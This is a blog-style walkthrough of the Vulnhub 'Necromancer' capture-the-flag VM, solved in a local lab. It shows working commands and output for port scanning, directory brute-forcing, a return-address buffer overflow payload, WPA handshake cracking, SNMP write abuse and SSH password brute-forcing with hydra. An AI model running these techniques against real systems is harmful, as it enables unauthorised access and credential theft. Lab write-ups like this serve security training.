Vulnhub – Necromancer

A friend of mine told me about where people upload various vulnerable images. Hackers, security professionals and anyone interested in cyber security can download an image of their choice, setup their virtual environment and have fun. I decided to give it a try too and chose Necromancer as my first image. The interesting name was the only reason why I chose this image.

The greek prefix ‘Necro-‘ means death and the suffix ‘-mancer’ means a practitioner of a specific type of divination ultimately suggesting the meaning of ‘Necromancer’ as a method of divination through alleged communication with the dead.

The game has 11 flags, one leading to another and hence such games are also popularly called ‘Capture The Flag’ or CTFs. So without any further ado lets get started with the game.

Discovering the Target

Let’s see where our target machine is. We’ll try to figure out the interface.

root@Sierra ~ % ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether b8:2a:72:b8:1c:78 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet netmask
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 688 bytes 55196 (53.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 688 bytes 55196 (53.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
vboxnet0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet netmask broadcast
inet6 fe80::800:27ff:fe00:0 prefixlen 64 scopeid 0x20<link>
ether 0a:00:27:00:00:00 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 267 bytes 13258 (12.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

The “vboxnet0” is the interface we’re looking for. Now that we know our target interface, let’s figure out the target’s IP address.

root@Sierra ~ % nmap -sn -n -v | grep -v “host down”
Starting Nmap 7.60 ( ) at 2017-11-05 10:24 IST
Initiating ARP Ping Scan at 10:24
Scanning 255 hosts [1 port/host]
Completed ARP Ping Scan at 10:24, 3.49s elapsed (255 total hosts)
Nmap scan report for
Host is up (0.00012s latency).
MAC Address: 08:00:27:57:13:4F (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up (0.00039s latency).
MAC Address: 08:00:27:DE:4E:19 (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up.
Read data files from: /usr/bin/../share/nmap
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.56 seconds
Raw packets sent: 508 (14.224KB) | Rcvd: 2 (56B)

Got it! is our target machine. Before we start attacking our target machine, let me remind you of a quote which is quite dear to a lot of cyber-security professionals.

Give me six hours to chop down a tree and I will spend the first four sharpening the axe.

— Abraham Lincoln

Had he born in this digital era, he would have said:

Give me six hours to attack a machine and I will spend the first four enumerating it.

— Abraham “Cyber” Lincoln

Following his steps, let’s scan the machine for any running and vulnerable service. See if the scan comes up with an open port.

root@Sierra ~ % nmap -v -sV -n -e vboxnet0 -p 1-65535
Starting Nmap 7.60 ( ) at 2017-11-05 10:38 IST
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 10:38
Scanning [1 port]
Completed ARP Ping Scan at 10:38, 0.23s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:38
Scanning [65535 ports]
SYN Stealth Scan Timing: About 2.27% done; ETC: 11:01 (0:22:17 remaining)
SYN Stealth Scan Timing: About 5.23% done; ETC: 11:01 (0:21:07 remaining)
SYN Stealth Scan Timing: About 9.58% done; ETC: 11:00 (0:19:59 remaining)
SYN Stealth Scan Timing: About 14.37% done; ETC: 11:00 (0:18:52 remaining)
SYN Stealth Scan Timing: About 19.40% done; ETC: 11:00 (0:17:43 remaining)
SYN Stealth Scan Timing: About 24.43% done; ETC: 11:00 (0:16:36 remaining)
SYN Stealth Scan Timing: About 29.45% done; ETC: 11:00 (0:15:29 remaining)
SYN Stealth Scan Timing: About 34.48% done; ETC: 11:00 (0:14:23 remaining)
SYN Stealth Scan Timing: About 39.51% done; ETC: 11:00 (0:13:16 remaining)
SYN Stealth Scan Timing: About 44.53% done; ETC: 11:00 (0:12:10 remaining)
SYN Stealth Scan Timing: About 49.55% done; ETC: 11:00 (0:11:04 remaining)
SYN Stealth Scan Timing: About 54.58% done; ETC: 11:00 (0:09:57 remaining)
SYN Stealth Scan Timing: About 59.83% done; ETC: 11:00 (0:08:48 remaining)
SYN Stealth Scan Timing: About 64.86% done; ETC: 11:00 (0:07:42 remaining)
SYN Stealth Scan Timing: About 69.89% done; ETC: 11:00 (0:06:36 remaining)
SYN Stealth Scan Timing: About 74.91% done; ETC: 11:00 (0:05:30 remaining)
SYN Stealth Scan Timing: About 79.94% done; ETC: 11:00 (0:04:24 remaining)
SYN Stealth Scan Timing: About 84.96% done; ETC: 11:00 (0:03:18 remaining)
SYN Stealth Scan Timing: About 89.98% done; ETC: 11:00 (0:02:12 remaining)
SYN Stealth Scan Timing: About 95.01% done; ETC: 11:00 (0:01:06 remaining)
Completed SYN Stealth Scan at 11:00, 1314.42s elapsed (65535 total ports)
Initiating Service scan at 11:00
NSE: Script scanning
Initiating NSE at 11:00
Completed NSE at 11:00, 0.00s elapsed
Initiating NSE at 11:00
Completed NSE at 11:00, 0.00s elapsed
Nmap scan report for
Host is up (0.00036s latency).
All 65535 scanned ports on are filtered
MAC Address: 08:00:27:DE:4E:19 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 1315.14 seconds
Raw packets sent: 131071 (5.767MB) | Rcvd: 23 (1.436KB)

All the ports are closed!! So much for the guidance Mr. Lincoln. 😐

Flag 1 : Chant Of The Wooden Box

If active reconnaissance doesn’t work, how about some passive? Let’s start a sniffer to listen to all the traffic inbound to this interface.

root@Sierra ~ % tcpdump -i vboxnet0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on vboxnet0, link-type EN10MB (Ethernet), capture size 262144 bytes
11:04:03.782096 IP > Flags [S], seq 4198818755,
win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 1021336954 ecr
0], length 0
11:04:03.782158 IP > Flags [R.], seq 0, ack
4198818756, win 0, length 0
11:04:03.785105 ARP, Request who-has tell, length 28
11:04:03.785109 ARP, Request who-has tell, length 28
11:04:03.787769 ARP, Request who-has tell, length 28

Looks like the machine is trying to talk to us on port 4444. See what it has to say.

root@Sierra ~ % netcat -lvp 4444
listening on [any] 4444 … inverse host lookup failed: Host name lookup failure
connect to [] from (UNKNOWN) [] 36177

The text between the “…” at the beginning and “…” at the end looks like a base64 encryption. Seems like we’re headed towards something. Let’s find out.

root@Sierra ~ % echo “V2VsY29tZSENCg0KWW91IGZpbmQgeW91cnNlbGYgc3RhcmluZyB0b3dhcmRzIHRoZSBo
| base64 --decode
You find yourself staring towards the horizon, with nothing but silence surrounding you.
You look east, then south, then west, all you can see is a great wasteland of nothingness.
Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible
The air around you begins to get thicker, and your heart begins to beat against your chest.
You turn to your left.. then to your right! You are trapped!
You fumble through your pockets.. nothing!
You look down and see you are standing in sand.
Dropping to your knees you begin to dig frantically.
As you dig you notice the barrier extends underground!
Frantically you keep digging and digging until your nails suddenly catch on an object.
You dig further and discover a small wooden box.
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.
You open the box, and find a parchment with the following written on it. “Chant the string
of flag1 -- u666”

Flag 2 : Words In The Sands

So, we have some text and we need to chant it on u666. This u666 seems to me like UDP port 666. Let’s see if it works.

root@Sierra ~ % netcat -u 666
Chant had no affect! Try in a different tongue!
You gasp for air! Time is running out!

Thought so! It’s not going to be easy. The text must be some cipher that we need to decrypt. I tried with base64 but no use. I googled a little and stumbled upon crackstation. This site has a huge indexed database to decrypt hashes.

Decrypted Flag 1

The text of flag 1 decrypts to opensesame. Let’s try chanting this on UDP 666.

root@Sierra ~ % netcat -u 666
A loud crack of thunder sounds as you are knocked to your feet!
Dazed, you start to feel fresh air entering your lungs.
You are free!
In front of you written in the sand are the words:
As you stand to your feet you notice that you can no longer see the flicker of light in the
You turn frantically looking in all directions until suddenly, a murder of crows appear on
the horizon.
As they get closer you can see one of the crows is grasping on to an object. As the sun hits
the object, shards of light beam from its surface.
The birds get closer, and closer, and closer.
Staring up at the crows you can see they are in a formation.
Squinting your eyes from the light coming from the object, you can see the formation looks
like the numeral 80.
As quickly as the birds appeared, they have left you once again…. alone… tortured by the
deafening sound of silence.
666 is closed.

We found our second flag. I tried decrypting flag 2 as well but it failed. Looks like the database of the website is huge but not huge enough to defeat Necromancer. The “numerical 80” is an obvious indication to HTTP port 80. Let’s hit it.

Flag 3 : Binary and yet the text

Upon visiting port 80 we get a message on the page with a pic below it.

Port 80

The message says:

Hours have passed since you first started to follow the crows.

Silence continues to engulf you as you treck towards a mountain range on the horizon.

More times passes and you are now standing in front of a great chasm.

Across the chasm you can see a necromancer standing in the mouth of a cave, staring skyward at the circling crows.

As you step closer to the chasm, a rock dislodges from beneath your feet and falls into the dark depths.

The necromancer looks towards you with hollow eyes which can only be described as death.

He smirks in your direction, and suddenly a bright light momentarily blinds you.

The silence is broken by a blood curdling screech of a thousand birds, followed by the necromancers laughs fading as he decends into the cave!

The crows break their formation, some flying aimlessly in the air; others now motionless upon the ground.

The cave is now protected by a gaseous blue haze, and an organised pile of feathers lay before you.

The grouping of feathers in the pic looks like a 21321. Maybe the decrypted value of flag 2 is supposed to be sent on this port. So I tried the next result on google and went to This time it decrypted and the message is 1033750779. Let’s try chanting it on port 21321.

root@Sierra ~ % netcat 21321
(UNKNOWN) [] 21321 (?) : Connection timed out

Nope! Nothing there. There could be some text or a file hidden inside the pic. Let’s see if we can extract something out of it.

root@Sierra ~ % wget
--2017-11-05 15:24:51--
Connecting to… connected.
HTTP request sent, awaiting response… 200 OK
Length: 37289 (36K) [image/jpeg]
Saving to: ‘pileoffeathers.jpg’
pileoffeathers.jpg 100%[========================================>] 36.42K --.-KB/s in 0.001s
2017-11-05 15:24:51 (26.5 MB/s) -- ‘pileoffeathers.jpg’ saved [37289/37289]
root@Sierra ~ % binwalk -e pileoffeathers.jpg
0 0x0 JPEG image data, EXIF standard
12 0xC TIFF image data, little-endian offset of first image directory: 8
270 0x10E Unix path: /”> <rdf:Description rdf:about=””
xmlns:xmp=”” xmlns:xmpMM=”http
36994 0x9082 Zip archive data, at least v2.0 to extract, compressed size: 121,
uncompressed size: 125, name: feathers.txt
37267 0x9193 End of Zip archive

We succeeded in extracting a zip file out of it. Let’s see what does it have.

root@Sierra ~ % ls
Desktop Downloads libreoffice Pictures _pileoffeathers.jpg.extracted Public Sync Videos
Documents GNS3 Music pileoffeathers.jpg pt sketchbook Templates ‘VirtualBox VMs’
root@Sierra ~ % cd _pileoffeathers.jpg.extracted
root@Sierra ~/_pileoffeathers.jpg.extracted % ls feathers.txt
root@Sierra ~/_pileoffeathers.jpg.extracted % cat feathers.txt

Do you see the “==” at the end of the text? That’s the padding used in base64 ciphers. This has to be it. Let’s try.

root@Sierra ~/_pileoffeathers.jpg.extracted % echo “ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2OD
Q==” | base64 --decode
flag3{9ad3f62db7b91c28b68137000394639f} -- Cross the chasm at /amagicbridgeappearsatthechasm

Bingo! Now we have 2 more leads. A flag, which I assume we need to decrypt the same way we have been doing the others and the directory /amagicbridgeappearsatthechasm.

It should be safe to assume that this is a web directory as we do not have an SSH connection or any sort of control over the file directory structure of the target system. Let’s find out.

Flag 4 : Etched Into The Surface – Buffer Overflow

Visiting port 80 reveals the next part of the story.

Walking Towards Flag 4

The text says:

You cautiously make your way across chasm.

You are standing on a snow covered plateau, surrounded by shear cliffs of ice and stone.

The cave before you is protected by some sort of spell cast by the necromancer.

You reach out to touch the gaseous blue haze, and can feel life being drawn from your soul the closer you get.

Hastily you take a few steps back away from the cave entrance.

There must be a magical item that could protect you from the necromancer’s spell.

Looks like we need to find something that’d protect us from this magic spell. I tried extracting data from this pic too but it didn’t work. So I went to decrypt the text we got in flag 3. The hash decrypted to 345465869.

But that doesn’t lead us to anything!! What we have now is decrypted flag2 and flag3 but none of them makes any sense. We cannot use these numbers to our advantage in any way. Seems like a dead end, doesn’t it?

Thanks to Georgia Weidman, I got to know about this tool named dirb from one of her Advanced Penetration Testing course I attended. This tool helps you to bruteforce an active web server to reveal the hidden web directories. If we’re lucky we might find some place to hop on. Moreover, there’s a tool but the name dirBuster which does the same task but has an interactable GUI but I’m just going to stick to dirb for now.

Lucky or not, there’s only one way to find out:


Dirb! Brute force attack. Now!

root@Sierra ~/_pileoffeathers.jpg.extracted % dirb /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
DIRB v2.22
By The Dark Raver
START_TIME: Sun Nov 5 16:06:38 2017
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
---- Scanning URL: ----
---- Entering directory: ----
END_TIME: Sun Nov 5 16:21:23 2017
DOWNLOADED: 163256 -- FOUND: 0

Great, We found /pics. It seems there’s nothing inside /pics that matches the entries of our dictionary. We can try visiting it manually.
Now use that attack on /amagicbridgeappearsatthechasm.

root@Sierra ~/_pileoffeathers.jpg.extracted % dirb /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
DIRB v2.22
By The Dark Raver
START_TIME: Sun Nov 5 16:31:31 2017
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
---- Scanning URL: ----
+ (CODE:200|SIZE:9676)
END_TIME: Sun Nov 5 16:39:40 2017

We found a talisman. Judging by the name it must be interesting. When I tried visiting /pics I got a 403 – Access Forbidden. So let’s head for talisman and try to find what it really is.

File Download

There’s a file for us to download. Since the file doesn’t have any extension I wonder what type of file it is.

root@Sierra ~/_pileoffeathers.jpg.extracted % file talisman
talisman: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked,
interpreter /lib/, for GNU/Linux 2.6.32, BuildID[sha1]=
2b131df906087adf163f8cba1967b3d2766e639d, not stripped

Well! Well! ELF stands for Executable and Linkable Format and LSB stands for Standard Linux Base. So it’s a 32-bit Linux executable. Guess I shouldn’t have any problem executing it. Let’s see what comes up.

root@Sierra ~/_pileoffeathers.jpg.extracted % chmod +x ./talisman
root@Sierra ~/_pileoffeathers.jpg.extracted % ./talisman
You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it’s surface.
Do you want to wear the talisman? No
Nothing happens.
root@Sierra ~/_pileoffeathers.jpg.extracted % ./talisman
You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it’s surface.
Do you want to wear the talisman? Yes
Nothing happens.
root@Sierra ~/_pileoffeathers.jpg.extracted % ./talisman
You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it’s surface.
Do you want to wear the talisman? wl/anfalw/enewlg
Nothing happens.

No matter what input you provide, it always returns the same message. But, if you think about it, what comes to your mind on putting an executable, an unrestricted user input and a cyber-security challenge together?

You’re probably right. A Stack-Smash Buffer Overflow attack. But, we need to figure out if it’s even worth it or not. GDB might come in handy here.

root@Sierra ~/_pileoffeathers.jpg.extracted % gdb -q ./talisman
Reading symbols from ./talisman…(no debugging symbols found)…done.
(gdb) break main
Breakpoint 1 at 0x8048a21
(gdb) run
Starting program: /root/_pileoffeathers.jpg.extracted/talisman
Breakpoint 1, 0x08048a21 in main ()
(gdb) info functions
All defined functions:
Non-debugging symbols:
0x080482d0 _init
0x08048310 printf@plt
0x08048320 __libc_start_main@plt
0x08048330 __isoc99_scanf@plt
0x08048350 _start
0x08048380 __x86.get_pc_thunk.bx
0x08048390 deregister_tm_clones
0x080483c0 register_tm_clones
0x08048400 __do_global_dtors_aux
0x08048420 frame_dummy
0x0804844b unhide
0x0804849d hide
0x080484f4 myPrintf
0x08048529 wearTalisman
0x08048a13 main
0x08048a37 chantToBreakSpell
0x08049530 __libc_csu_init
0x08049590 __libc_csu_fini
0x08049594 _fini
0xf7fd9810 __libc_memalign@plt
0xf7fd9820 malloc@plt
0xf7fd9830 calloc@plt
0xf7fd9840 realloc@plt
0xf7fe22a0 _dl_rtld_di_serinfo
0xf7fe9450 _dl_debug_state
0xf7feab50 _dl_mcount
0xf7feb4d0 _dl_tls_setup
0xf7feb580 _dl_get_tls_static_info
0xf7feb640 _dl_allocate_tls_init
0xf7feb8f0 _dl_allocate_tls
0xf7feb920 _dl_deallocate_tls
0xf7febc40 ___tls_get_addr
0xf7febc80 __tls_get_addr
0xf7fec050 _dl_make_stack_executable
0xf7fec5a0 _dl_find_dso_for_object
0xf7fef880 __get_cpu_features

There’s a huge list of functions but we don’t need to dig that deeper. A few lines from the beginning, we can see that there are function by the name wearTalisman and chantToBreakSpell. It’s obvious by their names that wearTalisman is the one taking the input and chantToBreakSpell could lead us to our next clue. So, we now need to make our program to jump to address 0x08048a37 but before we do so we need to find the exact size of the available input buffer. The explanation to this attack is beyond the scope of this article as it might take an article or two of its own. I might write about it some day in future though.

That being said, let’s see what the size of the buffer is. We can do it the difficult way by running the program multiple times and trying different inputs on each run or we can do it the easy way. I made a nasty little python script to do this dirty job for us. You can view the source of this python script on My Github Repository. I’m going to use it to figure out the input buffer size.

root@Sierra ~/_pileoffeathers.jpg.extracted % python3 --start 10 --step 5 --end
1000 ./talisman
Inside crashTesting…
Trying BOF with input size : 10
Executing command:
echo PPPPPPPPPP | ‘./talisman’
You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it’s surface.
Do you want to wear the talisman?
Nothing happens.
Trying BOF with input size : 15
Executing command:
echo PPPPPPPPPPPPPPP | ‘./talisman’
You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it’s surface.
Do you want to wear the talisman?
Nothing happens.
Trying BOF with input size : 20
Executing command:
echo PPPPPPPPPPPPPPPPPPPP | ‘./talisman’
You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it’s surface.
Do you want to wear the talisman?
Nothing happens.
Trying BOF with input size : 25
Executing command:
You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it’s surface.
Do you want to wear the talisman?
Nothing happens.
Trying BOF with input size : 30
Executing command:
You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it’s surface.
Do you want to wear the talisman?
Nothing happens.
Trying BOF with input size : 35
Executing command:
You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it’s surface.
Do you want to wear the talisman?
Nothing happens.
Segmentation fault
Program’s Stack Overflowed.
Buffer Size < 35

Aha! A Segmentation fault. The stack smashed at 35. So, this gives us estimate idea of how long we want our input to be in order to commit our evil deeds. It’s somewhere between 30 and 35. Now let’s open GDB again and see what’s the exact length of input that we need to provide before we could overwrite the return address.

root@Sierra ~/_pileoffeathers.jpg.extracted % gdb -q ./talisman
Reading symbols from ./talisman…(no debugging symbols found)…done.
(gdb) run
Starting program: /root/_pileoffeathers.jpg.extracted/talisman
You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it’s surface.
Nothing happens.
Program received signal SIGSEGV, Segmentation fault.
0x00414243 in ?? ()

I provided an input of 30 Ps followed by “EDCBA” and the program crashed(as it did earlier with out python script on reaching the input length of 35). But the point to notice is the very last line:

Program received signal SIGSEGV, Segmentation fault.
0x00414243 in ?? ()

The program crashed because it tried to return to address 00414243. This address is a hexadecimal representation. Now if we convert 41, 42 and 43 from the address to ASCII characters, we’d find that they are in fact ‘A’, ‘B’ and ‘C’ from our input. So the exact length we need to provide before we could overwrite the return address is 32 (30 Ps, ‘E’ and ‘D’ of our input). Now, instead of overwriting the address with “ABCDE” lets overwrite it with the address of the function that we want out program to execute. Yes! you got it right. It’s the function by the name chantToBreakSpell that we saw earlier and it’s address was 0x08048a37. Let’s carefully craft an input that’d make the program to execute the function of our wish and break the Necromancer’s spell.

root@Sierra ~/_pileoffeathers.jpg.extracted % python -c “print ‘P’*32 + ‘\x37\x8a\x04\x08′” | ./talisman
You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it’s surface.
Do you want to wear the talisman?
Nothing happens.
You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
Chant these words at u31337
zsh: done python -c “print ‘P’*32 + ‘\x37\x8a\x04\x08′” |
zsh: segmentation fault ./talisman

Yoohoo!!! It worked. But the spell didn’t break. You think the chant we have might break it? Decrypting the text results in the string blackmagic. We need to chant it over UDP port 31337.

Flag 5 : Etched In The Blood

Let’s chant the spell and see what happens.

root@Sierra ~/_pileoffeathers.jpg.extracted % netcat -u 31337
As you chant the words, a hissing sound echoes from the ice walls.
The blue aura disappears from the cave entrance.
You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock
wall as you descend deeper and deeper into the mountain.
You hear high pitched screeches coming from within the cave, and you start to feel a gentle
The screeches are getting closer, and with it the breeze begins to turn into an ice cold
Suddenly, you are attacked by a swarm of bats!
You aimlessly thrash at the air in front of you!
The bats continue their relentless attack, until…. silence.
Looking around you see no sign of any bats, and no indication of the struggle which had just
Looking towards one of the torches, you see something on the cave wall.
You walk closer, and notice a pile of mutilated bats lying on the cave floor. Above them,
a word etched in blood on the wall.

Flag 6 : Face off with death

The spell broke and we have a new cipher to crack. Decrypting it results in the string 809472671. 😒 Not again!! A number that doesn’t make any sense. The other part of the clue seems like a web directory to me. Let’s see if it really is.


Awesome!! A face off with the Necromancer. I have to admit that the pic is super cool and so is the story so far.

The text reads:

You continue to make your way through the cave.
In the distance you can see a familiar flicker of light moving in and out of the shadows.
As you get closer to the light you can hear faint footsteps, followed by the sound of a heavy door opening.
You move closer, and then stop frozen with fear.
It’s the necromancer!

Again he stares at you with deathly hollow eyes.
He is standing in a doorway; a staff in one hand, and an object in the other.
Smirking, the necromancer holds the staff and the object in the air.
He points his staff in your direction, and the stench of death and decay begins to fill the air.
You stare into his eyes and then…….

…… darkness. You open your eyes and find yourself lying on the damp floor of the cave.
The amulet must have saved you from whatever spell the necromancer had cast.
You stand to your feet. Behind you, only darkness.
Before you, a large door with the symbol of a skull engraved into the surface.
Looking closer at the skull, you can see u161 engraved into the forehead.

Decrypting the flag gives us another number 1756462165. I wonder what these numbers are for! A little googling tells that the port mentioned at the end (UDP 161) is a standard port of Simple network management protocol (SNMP). I thought they might have replaced the standard SNMP with something else and tried chanting all our unused flags on this port but for nothing.

There’s also a link on the page which allows us to download something. Wish it’s a stack smash too…Please!!!


Flag 7 : A ‘Walk’ To Where The Beacon Points

Let’s try to figure out what type of a file is this.

root@Sierra ~/_pileoffeathers.jpg.extracted % file necromancer
necromancer: bzip2 compressed data, block size = 900k
root@Sierra ~/_pileoffeathers.jpg.extracted % tar -xvjf necromancer
root@Sierra ~/_pileoffeathers.jpg.extracted % file necromancer.cap
necromancer.cap: tcpdump capture file (little-endian) -- version 2.4 (802.11, capture length 65535)

Hmm!! So it’s not another stack smash. It’s a compressed file upon extraction of which we get a tcpdump. Well, that’s a little wierd. I’d like to show the entire dump but it’s just to long to dump it here. So I’ve clipped almost all of it and displayed only the part which I focused on. Here it is:

root@Sierra ~/_pileoffeathers.jpg.extracted % tcpdump -A -r necromancer.cap
13:06:15.245276 Beacon (community) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] ESS CH:
13:06:15.843289 Probe Response (community) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit]
……..d.1.. community…..
13:06:21.568896 DeAuthentication (c4:12:f5:0d:5e:95 (oui Unknown)): Class 3 frame received
from nonassociated station
13:06:21.994834 Assoc Request (community) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit]
.. community……$0Hl2….`!…$…0…………………-.-…………………………..@.@k……L3-…………………….. …………P…..
13:06:22.043034 EAPOL key (3) v2, len 175
…………………Z-….6(….2C…..v.B..H0..2C…..v.B..H0…………………..h2……….P…LRLH…>.Z…6A….cy.w.).L.\..).. .#…
?\……..MbJ….~…..k. =..*=……

Looks like we have WiFi beacons from an access point by the name community which seems to be using channel 11, some probe responses, DeAuthentication signals being sent over the network, some Association requests, and finally it is what appears to me like a WPA Handshake. Does all of it ring any of your hacker bell? It does? Let’s see if we can rely on our instincts.

root@Sierra ~/_pileoffeathers.jpg.extracted % aircrack-ng necromancer.cap
Opening necromancer.cap
Read 2197 packets.
BSSID ESSID Encryption
1 C4:12:F5:0D:5E:95 community WPA (1 handshake)
Choosing first network as target.
Opening necromancer.cap
Please specify a dictionary (option -w).
Quitting aircrack-ng…

Loco Amigo!! I was correct about it. There’s a WPA handshake. Let’s go ahead and bruteforce it.

root@Sierra ~/_pileoffeathers.jpg.extracted % aircrack-ng -w /usr/share/wordlists/rockyou.txt necromancer.cap
Opening necromancer.cap
Read 2197 packets.
BSSID ESSID Encryption
1 C4:12:F5:0D:5E:95 community WPA (1 handshake)
Choosing first network as target.
Opening necromancer.cap
Reading packets, please wait…
Aircrack-ng 1.2 rc4
[00:00:10] 16088/9822768 keys tested (1613.68 k/s)
Time left: 1 hour, 41 minutes, 19 seconds 0.16%
KEY FOUND! [ death2all ]
Master Key : 7C F8 5B 00 BC B6 AB ED B0 53 F9 94 2D 4D B7 AC
DB FA 53 6F A9 ED D5 68 79 91 84 7B 7E 6E 0F E7
Transient Key : EB 8E 29 CE 8F 13 71 29 AF FF 04 D7 98 4C 32 3C
56 8E 6D 41 55 DD B7 E4 3C 65 9A 18 0B BE A3 B3
C8 9D 7F EE 13 2D 94 3C 3F B7 27 6B 06 53 EB 92
3B 10 A5 B0 FD 1B 10 D4 24 3C B9 D6 AC 23 D5 7D
EAPOL HMAC : F6 E5 E2 12 67 F7 1D DC 08 2B 17 9C 72 42 71 8E

And bruteforcing the encrypted 4-way handshake leaves us with its password death2all. Now let me try to put our situation together. We have a suspected SNMP service and a string death2all from an access point named community. A quick google search tells us that SNMP v1 and v2c happen to use a so called “Community String” that is sent to the SNMP server along with the request. The router replies with the requested stats only if the string is correct. This makes sense. Looks like we’re all set to “walk” ahead.

root@Sierra ~/_pileoffeathers.jpg.extracted % snmpwalk -c death2all -v 1
iso. = STRING: “You stand in front of a door.”
iso. = STRING: “The door is Locked. If you choose to defeat me, the door
must be Unlocked.”
iso. = STRING: “Fear the Necromancer!”
iso. = STRING: “Locked -- death2allrw!”
End of MIB

The message says that the door is ‘Locked’ and in order to defeat Necromancer the door must be ‘Unlocked’. The last string looks like the readable/writable version of out community string and it’s ‘Locked’ too. Let’s try making it ‘Unlocked’ and snmpwalk again.

root@Sierra ~/_pileoffeathers.jpg.extracted % snmpset -v 1 -c death2allrw
iso. s “Unlocked”
iso. = STRING: “Unlocked”
root@Sierra ~/_pileoffeathers.jpg.extracted % snmpwalk -c death2all -v 1
iso. = STRING: “You stand in front of a door.”
iso. = STRING: “The door is unlocked! You may now enter the Necromancer’s
iso. = STRING: “Fear the Necromancer!”
iso. = STRING: “flag7{9e5494108d10bbd5f9e7ae52239546c4} -- t22”
End of MIB

Haha! “t22”! Everyone knows what it means. All we need is a username ans a password. Flag 7 decrypts to demonslayer. I tried using it as the username and all the unused flags as password but as they say, “History repeats itself”. Those numbers are utterly useless. I tried demonslayer:demonslayer but nothing. So I planned to bruteforce it.

Flag 8, 9 and 10 : Questions Of Faith

root@Sierra ~/_pileoffeathers.jpg.extracted % hydra -s 22 -t 64 -l demonslayer -P /usr/share/wordlists/rockyou.txt ssh://
Hydra v8.6 (c) 2017 by van Hauser/THC -- Please do not use in military or secret service
organizations, or for illegal purposes.
Hydra ( starting at 2017-11-05 21:12:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to
reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399),
~224132 tries per task
[DATA] attacking ssh://
[22][ssh] host: login: demonslayer password: 12345678
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 53 final worker threads did not complete until end.
[ERROR] 53 targets did not resolve or could not be connected
[ERROR] 64 targets did not complete
Hydra ( finished at 2017-11-05 21:12:34

Success! Turns out the password was 12345678. I wished for something cool but life’s full of disappointments, isn’t it? Let’s move on and enter the Demon’s lair.

root@Sierra ~/_pileoffeathers.jpg.extracted % ssh -l demonslayer

Demon's Lair

Whoa!!! This ASCII art is unbelievably awesome!! Now, let’s see what do we have here.

root@Sierra ~/_pileoffeathers.jpg.extracted % ssh -l demonslayer
demonslayer@’s password:
Last login: Mon Oct 30 02:11:28 2017 from
cat flag8.txt
You enter the Necromancer’s Lair!
A stench of decay fills this place.
Jars filled with parts of creatures litter the bookshelves.
A fire with flames of green burns coldly in the distance.
Standing in the middle of the room with his back to you is the Necromancer.
In front of him lies a corpse, indistinguishable from any living creature you have seen before.
He holds a staff in one hand, and the flickering object in the other.
“You are a fool to follow me here! Do you not know who I am!”
The necromancer turns to face you. Dark words fill the air!
“You are damned already my friend. Now prepare for your own death!”
Defend yourself! Counter attack the Necromancer’s spells at u777!

Getting this close to Necromancer is scary but someone’s gotta do it! Since we’re already logged into the box, I decided not to switch terminal and nc from outside. The box comes with its own NetCat.

which nc
nc -u localhost 777
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Where do the Black Robes practice magic of the Greater Path? Kelewan
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Who did Johann Faust VIII make a deal with? Mephistopheles
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Who is tricked into passing the Ninth Gate? Hedge
A great flash of light knocks you to the ground; momentarily blinding you!
As your sight begins to return, you can see a thick black cloud of smoke lingering where
the Necromancer once stood.
